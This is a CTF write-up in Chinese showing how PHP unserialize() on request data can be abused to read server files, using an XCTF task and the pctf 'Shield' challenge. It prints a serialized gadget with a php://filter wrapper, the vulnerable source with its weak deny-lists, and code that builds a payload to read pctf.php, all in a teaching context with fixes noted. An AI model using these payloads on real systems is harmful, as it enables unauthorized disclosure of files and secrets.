
WEB中反序列化读取文件

  • 本文已发布在合天智汇,禁止转发。

XCTF的一道题

<?php
// Minimal deserialization gadget: $file is public, so a serialized string can
// set it, and the magic method below fires as soon as the object is used as a
// string (the echo at the bottom of this script does exactly that).
class flag{
    public $file;
    // PHP method names are case-insensitive, so this is the __toString hook.
    // It prints whatever path is in $file (here a php://filter wrapper, which
    // makes file_get_contents() return the base64 of the script instead of
    // executing it) and returns 'yes' as the object's string value.
    public function __tostring(){
        echo file_get_contents($this->file);
        return 'yes';
    }
}

// Build the object, print its serialized form, then unserialize it and echo it,
// which invokes flag::__tostring().
$obj = new flag();
$obj->file = 'php://filter/convert.base64-encode/resource=flag.php';
$payload = serialize($obj);
echo $payload, '<br>';
echo unserialize($payload);

神盾局的秘密 --pctf

读取showimg.php

<?php
    // Untrusted input: the file name is taken straight from the query string.
    $f = $_GET['img'];
    if (!empty($f)) {
        // The parameter is base64, so the checks below run on the decoded name.
        $f = base64_decode($f);
        // Deny-list only: the name is rejected if it contains '..', '/', '\\' or
        // (case-insensitively, because of stripos) the substring 'pctf'. Any other
        // name that passes is handed to readfile() unchanged. Defensive fix:
        // resolve the parameter against an allow-list of known image names
        // instead of enumerating bad substrings.
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

读取index.php

<?php 
    require_once('shield.php');
    $x = new Shield();
    // Reads the raw query parameter; $g stays undefined when it is absent, which
    // the empty() test below treats the same as an empty string.
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        // unserialize() on request data: the serialized string decides which
        // class is instantiated and the value of every property, so the client
        // sets Shield::$file directly. Defensive fix: accept a plain file name
        // (or JSON) and construct Shield server-side; at minimum pass
        // ['allowed_classes' => ['Shield']] as the second argument.
        $x = unserialize($g);
    }
    echo $x->readfile();
?>
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

读取shield.php

<?php
    //flag is in pctf.php
    // Holds a file name and reads it back; the deny-list in readfile() is the
    // only guard, and $file is public, so anything that controls the object's
    // state controls what is read.
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        
        // Returns the contents of $file when it is non-empty and contains none of
        // '..', '/', '\\'; otherwise falls off the end and returns null.
        // Note the last test uses == instead of ===: stripos() returns 0 for a
        // match at offset 0, and 0 == FALSE is true, so a leading backslash is not
        // rejected the way the other tests are. The @ hides read errors, so a
        // missing file yields false rather than a warning.
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

本地测试代码:

<?php
    // Local copy of the challenge's Shield class for testing the serialize()
    // round-trip. Behaves exactly like the original, including its loose
    // comparison on the backslash check.
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this->file = $filename;
        }

        // Returns the file contents when the name passes the deny-list, null
        // otherwise (false if the file cannot be read; errors are suppressed).
        function readfile() {
            $name = $this->file;
            if (empty($name)) {
                return;
            }
            if (stripos($name, '..') !== false || stripos($name, '/') !== false) {
                return;
            }
            // Same loose test as the challenge source: stripos() returns 0 for a
            // backslash at offset 0, and 0 == FALSE is true, so only a backslash
            // past offset 0 is rejected.
            $backslash = stripos($name, '\\');
            if ($backslash !== false && $backslash !== 0) {
                return;
            }
            return @file_get_contents($name);
        }
    }

    // Round-trip a Shield through serialize()/unserialize() and print both the
    // serialized form and what the restored object reads.
    $serialized = serialize(new Shield('pctf.php'));
    echo $serialized;
    $restored = unserialize($serialized);
    echo $restored->readfile();
    
?>